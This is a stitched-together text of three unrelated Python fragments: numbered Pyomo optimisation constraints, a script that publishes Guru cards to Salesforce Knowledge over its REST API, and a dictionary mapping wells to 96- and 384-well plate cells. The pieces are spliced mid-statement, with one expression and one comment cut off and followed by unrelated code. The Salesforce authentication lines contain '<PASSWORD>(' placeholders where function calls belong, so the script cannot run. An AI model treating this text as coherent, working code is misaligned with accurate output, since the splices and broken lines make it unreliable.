m.x1218 == 0)
m.c719 = Constraint(expr= - m.x413 - 0.93056815579703*m.x415 - 0.432978546291743*m.x417 - 0.134305349107462*m.x419
+ m.x1219 == 0)
m.c720 = Constraint(expr= - m.x414 - 0.93056815579703*m.x416 - 0.432978546291743*m.x418 - 0.134305349107462*m.x420
+ m.x1220 == 0)
m.c721 = Constraint(expr= - m.x421 - 0.06943184420297*m.x423 - 0.00241039049471275*m.x425 - 5.57859524324051E-5*m.x427
+ m.x1221 == 0)
m.c722 = Constraint(expr= - m.x422 - 0.06943184420297*m.x424 - 0.00241039049471275*m.x426 - 5.57859524324051E-5*m.x428
+ m.x1222 == 0)
m.c723 = Constraint(expr= - m.x421 - 0.33000947820757*m.x423 - 0.0544531278534163*m.x425 - 0.00599001610322534*m.x427
+ m.x1223 == 0)
m.c724 = Constraint(expr= - m.x422 - 0.33000947820757*m.x424 - 0.0544531278534163*m.x426 - 0.00599001610322534*m.x428
+ m.x1224 == 0)
m.c725 = Constraint(expr= - m.x421 - 0.66999052179243*m.x423 - 0.224443649645846*m.x425 - 0.0501250393130726*m.x427
+ m.x1225 == 0)
m.c726 = Constraint(expr= - m.x422 - 0.66999052179243*m.x424 - 0.224443649645846*m.x426 - 0.0501250393130726*m.x428
+ m.x1226 == 0)
m.c727 = Constraint(expr= - m.x421 - 0.93056815579703*m.x423 - 0.432978546291743*m.x425 - 0.134305349107462*m.x427
+ m.x1227 == 0)
m.c728 = Constraint(expr= - m.x422 - 0.93056815579703*m.x424 - 0.432978546291743*m.x426 - 0.134305349107462*m.x428
+ m.x1228 == 0)
m.c729 = Constraint(expr= - m.x429 - 0.06943184420297*m.x431 - 0.00241039049471275*m.x433 - 5.57859524324051E-5*m.x435
+ m.x1229 == 0)
m.c730 = Constraint(expr= - m.x430 - 0.06943184420297*m.x432 - 0.00241039049471275*m.x434 - 5.57859524324051E-5*m.x436
+ m.x1230 == 0)
m.c731 = Constraint(expr= - m.x429 - 0.33000947820757*m.x431 - 0.0544531278534163*m.x433 - 0.00599001610322534*m.x435
+ m.x1231 == 0)
m.c732 = Constraint(expr= - m.x430 - 0.33000947820757*m.x432 - 0.0544531278534163*m.x434 - 0.00599001610322534*m.x436
+ m.x1232 == 0)
m.c733 = Constraint(expr= - m.x429 - 0.66999052179243*m.x431 - 0.224443649645846*m.x433 - 0.0501250393130726*m.x435
+ m.x1233 == 0)
m.c734 = Constraint(expr= - m.x430 - 0.66999052179243*m.x432 - 0.224443649645846*m.x434 - 0.0501250393130726*m.x436
+ m.x1234 == 0)
m.c735 = Constraint(expr= - m.x429 - 0.93056815579703*m.x431 - 0.432978546291743*m.x433 - 0.134305349107462*m.x435
+ m.x1235 == 0)
m.c736 = Constraint(expr= - m.x430 - 0.93056815579703*m.x432 - 0.432978546291743*m.x434 - 0.134305349107462*m.x436
+ m.x1236 == 0)
m.c737 = Constraint(expr= - m.x437 - 0.06943184420297*m.x439 - 0.00241039049471275*m.x441 - 5.57859524324051E-5*m.x443
+ m.x1237 == 0)
m.c738 = Constraint(expr= - m.x438 - 0.06943184420297*m.x440 - 0.00241039049471275*m.x442 - 5.57859524324051E-5*m.x444
+ m.x1238 == 0)
m.c739 = Constraint(expr= - m.x437 - 0.33000947820757*m.x439 - 0.0544531278534163*m.x441 - 0.00599001610322534*m.x443
+ m.x1239 == 0)
m.c740 = Constraint(expr= - m.x438 - 0.33000947820757*m.x440 - 0.0544531278534163*m.x442 - 0.00599001610322534*m.x444
+ m.x1240 == 0)
m.c741 = Constraint(expr= - m.x437 - 0.66999052179243*m.x439 - 0.224443649645846*m.x441 - 0.0501250393130726*m.x443
+ m.x1241 == 0)
m.c742 = Constraint(expr= - m.x438 - 0.66999052179243*m.x440 - 0.224443649645846*m.x442 - 0.0501250393130726*m.x444
+ m.x1242 == 0)
m.c743 = Constraint(expr= - m.x437 - 0.93056815579703*m.x439 - 0.432978546291743*m.x441 - 0.134305349107462*m.x443
+ m.x1243 == 0)
m.c744 = Constraint(expr= - m.x438 - 0.93056815579703*m.x440 - 0.432978546291743*m.x442 - 0.134305349107462*m.x444
+ m.x1244 == 0)
m.c745 = Constraint(expr= - m.x445 - 0.06943184420297*m.x447 - 0.00241039049471275*m.x449 - 5.57859524324051E-5*m.x451
+ m.x1245 == 0)
m.c746 = Constraint(expr= - m.x446 - 0.06943184420297*m.x448 - 0.00241039049471275*m.x450 - 5.57859524324051E-5*m.x452
+ m.x1246 == 0)
m.c747 = Constraint(expr= - m.x445 - 0.33000947820757*m.x447 - 0.0544531278534163*m.x449 - 0.00599001610322534*m.x451
+ m.x1247 == 0)
m.c748 = Constraint(expr= - m.x446 - 0.33000947820757*m.x448 - 0.0544531278534163*m.x450 - 0.00599001610322534*m.x452
+ m.x1248 == 0)
m.c749 = Constraint(expr= - m.x445 - 0.66999052179243*m.x447 - 0.224443649645846*m.x449 - 0.0501250393130726*m.x451
+ m.x1249 == 0)
m.c750 = Constraint(expr= - m.x446 - 0.66999052179243*m.x448 - 0.224443649645846*m.x450 - 0.0501250393130726*m.x452
+ m.x1250 == 0)
m.c751 = Constraint(expr= - m.x445 - 0.93056815579703*m.x447 - 0.432978546291743*m.x449 - 0.134305349107462*m.x451
+ m.x1251 == 0)
m.c752 = Constraint(expr= - m.x446 - 0.93056815579703*m.x448 - 0.432978546291743*m.x450 - 0.134305349107462*m.x452
+ m.x1252 == 0)
m.c753 = Constraint(expr= - m.x453 - 0.06943184420297*m.x455 - 0.00241039049471275*m.x457 - 5.57859524324051E-5*m.x459
+ m.x1253 == 0)
m.c754 = Constraint(expr= - m.x454 - 0.06943184420297*m.x456 - 0.00241039049471275*m.x458 - 5.57859524324051E-5*m.x460
+ m.x1254 == 0)
m.c755 = Constraint(expr= - m.x453 - 0.33000947820757*m.x455 - 0.0544531278534163*m.x457 - 0.00599001610322534*m.x459
+ m.x1255 == 0)
m.c756 = Constraint(expr= - m.x454 - 0.33000947820757*m.x456 - 0.0544531278534163*m.x458 - 0.00599001610322534*m.x460
+ m.x1256 == 0)
m.c757 = Constraint(expr= - m.x453 - 0.66999052179243*m.x455 - 0.224443649645846*m.x457 - 0.0501250393130726*m.x459
+ m.x1257 == 0)
m.c758 = Constraint(expr= - m.x454 - 0.66999052179243*m.x456 - 0.224443649645846*m.x458 - 0.0501250393130726*m.x460
+ m.x1258 == 0)
m.c759 = Constraint(expr= - m.x453 - 0.93056815579703*m.x455 - 0.432978546291743*m.x457 - 0.134305349107462*m.x459
+ m.x1259 == 0)
m.c760 = Constraint(expr= - m.x454 - 0.93056815579703*m.x456 - 0.432978546291743*m.x458 - 0.134305349107462*m.x460
+ m.x1260 == 0)
m.c761 = Constraint(expr= - m.x461 - 0.06943184420297*m.x463 - 0.00241039049471275*m.x465 - 5.57859524324051E-5*m.x467
+ m.x1261 == 0)
m.c762 = Constraint(expr= - m.x462 - 0.06943184420297*m.x464 - 0.00241039049471275*m.x466 - 5.57859524324051E-5*m.x468
+ m.x1262 == 0)
m.c763 = Constraint(expr= - m.x461 - 0.33000947820757*m.x463 - 0.0544531278534163*m.x465 - 0.00599001610322534*m.x467
+ m.x1263 == 0)
m.c764 = Constraint(expr= - m.x462 - 0.33000947820757*m.x464 - 0.0544531278534163*m.x466 - 0.00599001610322534*m.x468
+ m.x1264 == 0)
m.c765 = Constraint(expr= - m.x461 - 0.66999052179243*m.x463 - 0.224443649645846*m.x465 - 0.0501250393130726*m.x467
+ m.x1265 == 0)
m.c766 = Constraint(expr= - m.x462 - 0.66999052179243*m.x464 - 0.224443649645846*m.x466 - 0.0501250393130726*m.x468
+ m.x1266 == 0)
m.c767 = Constraint(expr= - m.x461 - 0.93056815579703*m.x463 - 0.432978546291743*m.x465 - 0.134305349107462*m.x467
+ m.x1267 == 0)
m.c768 = Constraint(expr= - m.x462 - 0.93056815579703*m.x464 - 0.432978546291743*m.x466 - 0.134305349107462*m.x468
+ m.x1268 == 0)
m.c769 = Constraint(expr= - m.x469 - 0.06943184420297*m.x471 - 0.00241039049471275*m.x473 - 5.57859524324051E-5*m.x475
+ m.x1269 == 0)
m.c770 = Constraint(expr= - m.x470 - 0.06943184420297*m.x472 - 0.00241039049471275*m.x474 - 5.57859524324051E-5*m.x476
+ m.x1270 == 0)
m.c771 = Constraint(expr= - m.x469 - 0.33000947820757*m.x471 - 0.0544531278534163*m.x473 - 0.00599001610322534*m.x475
+ m.x1271 == 0)
m.c772 = Constraint(expr= - m.x470 - 0.33000947820757*m.x472 - 0.0544531278534163*m.x474 - 0.00599001610322534*m.x476
+ m.x1272 == 0)
m.c773 = Constraint(expr= - m.x469 - 0.66999052179243*m.x471 - 0.224443649645846*m.x473 - 0.0501250393130726*m.x475
+ m.x1273 == 0)
m.c774 = Constraint(expr= - m.x470 - 0.66999052179243*m.x472 - 0.224443649645846*m.x474 - 0.0501250393130726*m.x476
+ m.x1274 == 0)
m.c775 = Constraint(expr= - m.x469 - 0.93056815579703*m.x471 - 0.432978546291743*m.x473 - 0.134305349107462*m.x475
+ m.x1275 == 0)
m.c776 = Constraint(expr= - m.x470 - 0.93056815579703*m.x472 - 0.432978546291743*m.x474 - 0.134305349107462*m.x476
+ m.x1276 == 0)
m.c777 = Constraint(expr= - m.x477 - 0.06943184420297*m.x479 - 0.00241039049471275*m.x481 - 5.57859524324051E-5*m.x483
+ m.x1277 == 0)
m.c778 = Constraint(expr= - m.x478 - 0.06943184420297*m.x480 - 0.00241039049471275*m.x482 - 5.57859524324051E-5*m.x484
+ m.x1278 == 0)
m.c779 = Constraint(expr= - m.x477 - 0.33000947820757*m.x479 - 0.0544531278534163*m.x481 - 0.00599001610322534*m.x483
+ m.x1279 == 0)
m.c780 = Constraint(expr= - m.x478 - 0.33000947820757*m.x480 - 0.0544531278534163*m.x482 - 0.00599001610322534*m.x484
+ m.x1280 == 0)
m.c781 = Constraint(expr= - m.x477 - 0.66999052179243*m.x479 - 0.224443649645846*m.x481 - 0.0501250393130726*m.x483
+ m.x1281 == 0)
m.c782 = Constraint(expr= - m.x478 - 0.66999052179243*m.x480 - 0.224443649645846*m.x482 - 0.0501250393130726*m.x484
+ m.x1282 == 0)
m.c783 = Constraint(expr= - m.x477 - 0.93056815579703*m.x479 - 0.432978546291743*m.x481 - 0.134305349107462*m.x483
+ m.x1283 == 0)
m.c784 = Constraint(expr= - m.x478 - 0.93056815579703*m.x480 - 0.432978546291743*m.x482 - 0.134305349107462*m.x484
+ m.x1284 == 0)
m.c785 = Constraint(expr= - m.x485 - 0.06943184420297*m.x487 - 0.00241039049471275*m.x489 - 5.57859524324051E-5*m.x491
+ m.x1285 == 0)
m.c786 = Constraint(expr= - m.x486 - 0.06943184420297*m.x488 - 0.00241039049471275*m.x490 - 5.57859524324051E-5*m.x492
+ m.x1286 == 0)
m.c787 = Constraint(expr= - m.x485 - 0.33000947820757*m.x487 - 0.0544531278534163*m.x489 - 0.00599001610322534*m.x491
+ m.x1287 == 0)
m.c788 = Constraint(expr= - m.x486 - 0.33000947820757*m.x488 - 0.0544531278534163*m.x490 - 0.00599001610322534*m.x492
+ m.x1288 == 0)
m.c789 = Constraint(expr= - m.x485 - 0.66999052179243*m.x487 - 0.224443649645846*m.x489 - 0.0501250393130726*m.x491
+ m.x1289 == 0)
m.c790 = Constraint(expr= - m.x486 - 0.66999052179243*m.x488 - 0.224443649645846*m.x490 - 0.0501250393130726*m.x492
+ m.x1290 == 0)
m.c791 = Constraint(expr= - m.x485 - 0.93056815579703*m.x487 - 0.432978546291743*m.x489 - 0.134305349107462*m.x491
+ m.x1291 == 0)
m.c792 = Constraint(expr= - m.x486 - 0.93056815579703*m.x488 - 0.432978546291743*m.x490 - 0.134305349107462*m.x492
+ m.x1292 == 0)
m.c793 = Constraint(expr= - m.x493 - 0.06943184420297*m.x495 - 0.00241039049471275*m.x497 - 5.57859524324051E-5*m.x499
+ m.x1293 == 0)
m.c794 = Constraint(expr= - m.x494 - 0.06943184420297*m.x496 - 0.00241039049471275*m.x498 - 5.57859524324051E-5*m.x500
+ m.x1294 == 0)
m.c795 = Constraint(expr= - m.x493 - 0.33000947820757*m.x495 - 0.0544531278534163*m.x497 - 0.00599001610322534*m.x499
+ m.x1295 == 0)
m.c796 = Constraint(expr= - m.x494 - 0.33000947820757*m.x496 - 0.0544531278534163*m.x498 - 0.00599001610322534*m.x500
+ m.x1296 == 0)
m.c797 = Constraint(expr= - m.x493 - 0.66999052179243*m.x495 - 0.224443649645846*m.x497 - 0.0501250393130726*m.x499
+ m.x1297 == 0)
m.c798 = Constraint(expr= - m.x494 - 0.66999052179243*m.x496 - 0.224443649645846*m.x498 - 0.0501250393130726*m.x500
+ m.x1298 == 0)
m.c799 = Constraint(expr= - m.x493 - 0.93056815579703*m.x495 - 0.432978546291743*m.x497 - 0.134305349107462*m.x499
+ m.x1299 == 0)
m.c800 = Constraint(expr= - m.x494 - 0.93056815579703*m.x496 - 0.432978546291743*m.x498 - 0.134305349107462*m.x500
+ m.x1300 == 0)
m.c801 = Constraint(expr= m.x1 - m.x3 + 0.019*m.x101 + 0.0095*m.x103 + 0.00316666666666667*m.x105
+ 0.000791666666666667*m.x107 == 0)
m.c802 = Constraint(expr= m.x2 - m.x4 + 0.019*m.x102 + 0.0095*m.x104 + 0.00316666666666667*m.x106
+ 0.000791666666666667*m.x108 == 0)
m.c803 = Constraint(expr= m.x3 - m.x5 + 0.019*m.x109 + 0.0095*m.x111 + 0.00316666666666667*m.x113
+ 0.000791666666666667*m.x115 == 0)
m.c804 = Constraint(expr= m.x4 - m.x6 + 0.019*m.x110 + 0.0095*m.x112 + 0.00316666666666667*m.x114
+ 0.000791666666666667*m.x116 == 0)
m.c805 = Constraint(expr= m.x5 - m.x7 + 0.019*m.x117 + 0.0095*m.x119 + 0.00316666666666667*m.x121
+ 0.000791666666666667*m.x123 == 0)
m.c806 = Constraint(expr= m.x6 - m.x8 + 0.019*m.x118 + 0.0095*m.x120 + 0.00316666666666667*m.x122
+ 0.000791666666666667*m.x124 == 0)
m.c807 = Constraint(expr= m.x7 - m.x9 + 0.019*m.x125 + 0.0095*m.x127 + 0.00316666666666667*m.x129
+ 0.000791666666666667*m.x131 == 0)
m.c808 = Constraint(expr= m.x8 - m.x10 + 0.019*m.x126 + 0.0095*m.x128 + 0.00316666666666667*m.x130
+ 0.000791666666666667*m.x132 == 0)
m.c809 = Constraint(expr= m.x9 - m.x11 + 0.019*m.x133 + 0.0095*m.x135
"""
This script shows how to use Guru's SDK to publish cards, boards, or entire
collections to an external site -- in this case, Salesforce Knowledge.
This script takes the contents of a board in Guru and makes API calls to
Salesforce to create or update Knowledge objects as needed.
1. Behind the scenes, the SDK enumerates all the sections and cards on the
board we specify.
2. The SDK also writes a metadata .json file to keep track of which cards have
been published before.
3. Using the metadata, the SDK knows whether a card has been published before
and needs to be updated in Salesforce or is a brand new card and we need to
create a Knowledge object in Salesforce.
The SDK orchestrates everything and this file just needs to implement methods
that call SFDC's API to do specific tasks. When the SDK sees a card that's never
been published before, it'll call create_external_card and we implement the POST
call to create the external representation of a card (e.g. the Knowledge object).
This script uses these environment variables:
- GURU_USER and GURU_TOKEN to authenticate Guru API calls.
- SFDC_CLIENT_ID
- SFDC_CLIENT_SECRET
- SFDC_USERNAME
- SFDC_PASSWORD
- SFDC_TOKEN
"""
import os
import guru
import requests
from urllib.parse import quote
# these are the names of the collections that will be published.
# we use these to know which collections to publish and to determine
# which cards are internal and which are external.
INTERNAL_COLLECTION = "Publish to Salesforce (Internal)"
EXTERNAL_COLLECTION = "Publish to Salesforce (External)"
# these are the values for an article's Validation Status.
VALIDATED_INTERNAL_ONLY = "Validated Internal only"
VALIDATED_EXTERNAL = "Validated External"
# we expect that data categories are represented in guru as board
# assignments, but we might also want to use specific tags to
# represent a data category assignment.
TAGS_THAT_ARE_DATA_CATEGORIES = [
"tag 1",
"tag 2",
"tag 3"
]
def is_external(card):
"""
Some articles are internal and some are external. We determine
this by checking which collection the card comes from.
"""
return card.collection.title == EXTERNAL_COLLECTION
def get_data_categories(card):
"""
This returns a list of strings that are the data category names the
card should be assigned to. This is a combination of the names of the
boards the card is on, plus some special tags.
"""
# every board corresponds to a data category.
categories = [b.title for b in card.boards]
# there are also specific tags that correspond to data categories.
for tag in card.tags:
if tag.value in TAGS_THAT_ARE_DATA_CATEGORIES:
categories.append(tag.value)
return categories
def convert_card_to_article(card):
"""
This builds the Knowledge object that'll be saved in Salesforce.
It's mostly setting the title and body fields but also setting
some other properties based on whether the card represents an
internal article or external one.
"""
data = {
"title": card.title,
# this is the Knowledge object's rich text field which is not configured by default.
# i called mine 'Body' so that's why this is 'Body__c'.
"Body__c": card.content,
# the UrlName is like the title but meant to be displayed in a URL, in Guru
# we have the card's slug which serves the same purpose. the slug has two
# parts, an ID and title, so we just need the second part here.
"UrlName": card.slug.split("/")[1].strip("-"),
}
# we set some properties differently depending on whether it's an internal or external article.
if is_external(card):
data["ValidationStatus"] = VALIDATED_EXTERNAL
# these are the article's channels.
data["IsVisibleInPkb"] = True # public knowledge base
data["IsVisibleInCsp"] = True # customer
data["IsVisibleInPrm"] = True # partner
else:
data["ValidationStatus"] = VALIDATED_INTERNAL_ONLY
# these are the article's channels.
data["IsVisibleInPkb"] = False # public knowledge base
data["IsVisibleInCsp"] = False # customer
data["IsVisibleInPrm"] = False # partner
return data
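# As a rough illustration (all card values below are hypothetical, not taken
# from any real board), a card titled "How to reset a password" in the
# external collection, with slug "abc123/how-to-reset-a-password", would map to:
#
#   {
#     "title": "How to reset a password",
#     "Body__c": "<p>...the card's HTML content...</p>",
#     "UrlName": "how-to-reset-a-password",
#     "ValidationStatus": "Validated External",
#     "IsVisibleInPkb": True,
#     "IsVisibleInCsp": True,
#     "IsVisibleInPrm": True,
#   }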
class SalesforcePublisher(guru.Publisher):
def __init__(self, g, dry_run=False):
super().__init__(g, dry_run=dry_run)
# We need to get an SFDC access token.
# I set this connection up in salesforce by following this guide:
# https://developer.salesforce.com/docs/atlas.en-us.chatterapi.meta/chatterapi/CR_quickstart_oauth.htm
data = {
"grant_type": "password",
"client_id": os.environ.get("SFDC_CLIENT_ID"),
"client_secret": os.environ.get("SFDC_CLIENT_SECRET"),
"username": os.environ.get("SFDC_USERNAME"),
"password": <PASSWORD>("SFDC_PASSWORD") + <PASSWORD>("SFDC_TOKEN")
}
response = requests.post("https://login.salesforce.com/services/oauth2/token", data=data)
if response.status_code >= 400:
error_message = "Failed to authenticate with Salesforce, response status %s, response body %s" % (
response.status_code,
response.content
)
self.log_error(error_message)
raise RuntimeError(error_message)
sfdc_data = response.json()
self.sfdc_token = sfdc_data.get("access_token")
self.sfdc_url = sfdc_data.get("instance_url")
self.data_categories = self.get_all_data_categories()
def get_external_url(self, external_id, card):
"""
This is used for converting card-to-card links to link from one
Salesforce Knowledge object to another. When we're publishing a card
that links to another Guru card, we use this method to convert the
card-to-card link to be a link between salesforce knowledge articles.
"""
return "https://support.getguru.com/help/s/article/%s" % external_id
def find_external_card(self, card):
"""
If some articles may already exist in Salesforce, this method
is how you'd match a Guru card to an existing Knowledge object.
For example, this method could search SFDC to see if there's
a Knowledge object with the same title as this card. If this
method returns the SFDC Object's ID, the SDK then knows the card
exists in SFDC already and calls update_external_card().
If you expect all articles will be written in Guru first, then
you don't need to worry about this method.
"""
pass
def sfdc_get(self, url):
"""
Makes a GET call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.get(url, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return response.json()
def sfdc_post(self, url, data):
"""
Makes a POST call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.post(url, json=data, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return response.json()
def sfdc_patch(self, url, data):
"""
Makes a PATCH call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.patch(url, json=data, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return True
def sfdc_delete(self, url):
"""
Makes a DELETE call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.delete(url, headers=headers)
if response.status_code == 204:
return True
else:
return response.json()
def get_all_data_categories(self):
"""
Loads the list of all Data Categories and Data Category Groups from
Salesforce. When we need to map an article to a Data Category, we'll need
to have the Data Category's ID. By loading all of them up front, we'll be
able to look up the ID when we need it without making extra API calls.
"""
# https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/dome_query.htm
data_category_groups = self.sfdc_get("/services/data/v52.0/support/dataCategoryGroups?sObjectName=KnowledgeArticleVersion&topCategoriesOnly=false").get("categoryGroups")
# data categories are arranged in a tree so we use this function to recursively
# find all categories and build a flat list.
def find_categories(group_name, objects):
categories = []
# each object in the list looks like this:
# {
# 'childCategories': [],
# 'label': 'Known Issues',
# 'name': 'Known_Issues',
# 'url': '/services/data/v52.0/support/dataCategoryGroups/Announcements/dataCategories/Known_Issues?sObjectName=KnowledgeArticleVersion'
68,
},
69: {
'col_and_row': u'F9',
'row': 6,
'col': 9,
'well_id': 69,
},
70: {
'col_and_row': u'F10',
'row': 6,
'col': 10,
'well_id': 70,
},
71: {
'col_and_row': u'F11',
'row': 6,
'col': 11,
'well_id': 71,
},
72: {
'col_and_row': u'F12',
'row': 6,
'col': 12,
'well_id': 72,
},
73: {
'col_and_row': u'G1',
'row': 7,
'col': 1,
'well_id': 73,
},
74: {
'col_and_row': u'G2',
'row': 7,
'col': 2,
'well_id': 74,
},
75: {
'col_and_row': u'G3',
'row': 7,
'col': 3,
'well_id': 75,
},
76: {
'col_and_row': u'G4',
'row': 7,
'col': 4,
'well_id': 76,
},
77: {
'col_and_row': u'G5',
'row': 7,
'col': 5,
'well_id': 77,
},
78: {
'col_and_row': u'G6',
'row': 7,
'col': 6,
'well_id': 78,
},
79: {
'col_and_row': u'G7',
'row': 7,
'col': 7,
'well_id': 79,
},
80: {
'col_and_row': u'G8',
'row': 7,
'col': 8,
'well_id': 80,
},
81: {
'col_and_row': u'G9',
'row': 7,
'col': 9,
'well_id': 81,
},
82: {
'col_and_row': u'G10',
'row': 7,
'col': 10,
'well_id': 82,
},
83: {
'col_and_row': u'G11',
'row': 7,
'col': 11,
'well_id': 83,
},
84: {
'col_and_row': u'G12',
'row': 7,
'col': 12,
'well_id': 84,
},
85: {
'col_and_row': u'H1',
'row': 8,
'col': 1,
'well_id': 85,
},
86: {
'col_and_row': u'H2',
'row': 8,
'col': 2,
'well_id': 86,
},
87: {
'col_and_row': u'H3',
'row': 8,
'col': 3,
'well_id': 87,
},
88: {
'col_and_row': u'H4',
'row': 8,
'col': 4,
'well_id': 88,
},
89: {
'col_and_row': u'H5',
'row': 8,
'col': 5,
'well_id': 89,
},
90: {
'col_and_row': u'H6',
'row': 8,
'col': 6,
'well_id': 90,
},
91: {
'col_and_row': u'H7',
'row': 8,
'col': 7,
'well_id': 91,
},
92: {
'col_and_row': u'H8',
'row': 8,
'col': 8,
'well_id': 92,
},
93: {
'col_and_row': u'H9',
'row': 8,
'col': 9,
'well_id': 93,
},
94: {
'col_and_row': u'H10',
'row': 8,
'col': 10,
'well_id': 94,
},
95: {
'col_and_row': u'H11',
'row': 8,
'col': 11,
'well_id': 95,
},
96: {
'col_and_row': u'H12',
'row': 8,
'col': 12,
'well_id': 96,
},
}
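# A minimal sketch (not part of the original module) of how a map with this
# shape could be generated instead of hard-coded, here for a standard
# 96-well plate (8 rows x 12 columns); build_well_map(16, 24) would produce
# the 384-well variant defined below:
#
#   def build_well_map(n_rows=8, n_cols=12):
#       well_map = {}
#       for well_id in range(1, n_rows * n_cols + 1):
#           row = (well_id - 1) // n_cols + 1
#           col = (well_id - 1) % n_cols + 1
#           well_map[well_id] = {
#               'col_and_row': u'%s%d' % (chr(ord('A') + row - 1), col),
#               'row': row,
#               'col': col,
#               'well_id': well_id,
#           }
#       return well_map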
well_id_to_cell_map_384 = {
1: {
'col_and_row': u'A1',
'row': 1,
'col': 1,
'well_id': 1,
},
2: {
'col_and_row': u'A2',
'row': 1,
'col': 2,
'well_id': 2,
},
3: {
'col_and_row': u'A3',
'row': 1,
'col': 3,
'well_id': 3,
},
4: {
'col_and_row': u'A4',
'row': 1,
'col': 4,
'well_id': 4,
},
5: {
'col_and_row': u'A5',
'row': 1,
'col': 5,
'well_id': 5,
},
6: {
'col_and_row': u'A6',
'row': 1,
'col': 6,
'well_id': 6,
},
7: {
'col_and_row': u'A7',
'row': 1,
'col': 7,
'well_id': 7,
},
8: {
'col_and_row': u'A8',
'row': 1,
'col': 8,
'well_id': 8,
},
9: {
'col_and_row': u'A9',
'row': 1,
'col': 9,
'well_id': 9,
},
10: {
'col_and_row': u'A10',
'row': 1,
'col': 10,
'well_id': 10,
},
11: {
'col_and_row': u'A11',
'row': 1,
'col': 11,
'well_id': 11,
},
12: {
'col_and_row': u'A12',
'row': 1,
'col': 12,
'well_id': 12,
},
13: {
'col_and_row': u'A13',
'row': 1,
'col': 13,
'well_id': 13,
},
14: {
'col_and_row': u'A14',
'row': 1,
'col': 14,
'well_id': 14,
},
15: {
'col_and_row': u'A15',
'row': 1,
'col': 15,
'well_id': 15,
},
16: {
'col_and_row': u'A16',
'row': 1,
'col': 16,
'well_id': 16,
},
17: {
'col_and_row': u'A17',
'row': 1,
'col': 17,
'well_id': 17,
},
18: {
'col_and_row': u'A18',
'row': 1,
'col': 18,
'well_id': 18,
},
19: {
'col_and_row': u'A19',
'row': 1,
'col': 19,
'well_id': 19,
},
20: {
'col_and_row': u'A20',
'row': 1,
'col': 20,
'well_id': 20,
},
21: {
'col_and_row': u'A21',
'row': 1,
'col': 21,
'well_id': 21,
},
22: {
'col_and_row': u'A22',
'row': 1,
'col': 22,
'well_id': 22,
},
23: {
'col_and_row': u'A23',
'row': 1,
'col': 23,
'well_id': 23,
},
24: {
'col_and_row': u'A24',
'row': 1,
'col': 24,
'well_id': 24,
},
25: {
'col_and_row': u'B1',
'row': 2,
'col': 1,
'well_id': 25,
},
26: {
'col_and_row': u'B2',
'row': 2,
'col': 2,
'well_id': 26,
},
27: {
'col_and_row': u'B3',
'row': 2,
'col': 3,
'well_id': 27,
},
28: {
'col_and_row': u'B4',
'row': 2,
'col': 4,
'well_id': 28,
},
29: {
'col_and_row': u'B5',
'row': 2,
'col': 5,
'well_id': 29,
},
30: {
'col_and_row': u'B6',
'row': 2,
'col': 6,
'well_id': 30,
},
31: {
'col_and_row': u'B7',
'row': 2,
'col': 7,
'well_id': 31,
},
32: {
'col_and_row': u'B8',
'row': 2,
'col': 8,
'well_id': 32,
},
33: {
'col_and_row': u'B9',
'row': 2,
'col': 9,
'well_id': 33,
},
34: {
'col_and_row': u'B10',
'row': 2,
'col': 10,
'well_id': 34,
},
35: {
'col_and_row': u'B11',
'row': 2,
'col': 11,
'well_id': 35,
},
36: {
'col_and_row': u'B12',
'row': 2,
'col': 12,
'well_id': 36,
},
37: {
'col_and_row': u'B13',
'row': 2,
'col': 13,
'well_id': 37,
},
38: {
'col_and_row': u'B14',
'row': 2,
'col': 14,
'well_id': 38,
},
39: {
'col_and_row': u'B15',
'row': 2,
'col': 15,
'well_id': 39,
},
40: {
'col_and_row': u'B16',
'row': 2,
'col': 16,
'well_id': 40,
},
41: {
'col_and_row': u'B17',
'row': 2,
'col': 17,
'well_id': 41,
},
42: {
'col_and_row': u'B18',
'row': 2,
'col': 18,
'well_id': 42,
},
43: {
'col_and_row': u'B19',
'row': 2,
'col': 19,
'well_id': 43,
},
44: {
'col_and_row': u'B20',
'row': 2,
'col': 20,
'well_id': 44,
},
45: {
'col_and_row': u'B21',
'row': 2,
'col': 21,
'well_id': 45,
},
46: {
'col_and_row': u'B22',
'row': 2,
'col': 22,
'well_id': 46,
},
47: {
'col_and_row': u'B23',
'row': 2,
'col': 23,
'well_id': 47,
},
48: {
'col_and_row': u'B24',
'row': 2,
'col': 24,
'well_id': 48,
},
49: {
'col_and_row': u'C1',
'row': 3,
'col': 1,
'well_id': 49,
},
50: {
'col_and_row': u'C2',
'row': 3,
'col': 2,
'well_id': 50,
},
51: {
'col_and_row': u'C3',
'row': 3,
'col': 3,
'well_id': 51,
},
52: {
'col_and_row': u'C4',
'row': 3,
'col': 4,
'well_id': 52,
},
53: {
'col_and_row': u'C5',
'row': 3,
'col': 5,
'well_id': 53,
},
54: {
'col_and_row': u'C6',
'row': 3,
'col': 6,
'well_id': 54,
},
55: {
'col_and_row': u'C7',
'row': 3,
'col': 7,
'well_id': 55,
},
56: {
'col_and_row': u'C8',
'row': 3,
'col': 8,
'well_id': 56,
},
57: {
'col_and_row': u'C9',
'row': 3,
'col': 9,
'well_id': 57,
},
58: {
'col_and_row': u'C10',
'row': 3,
'col': 10,
'well_id': 58,
},
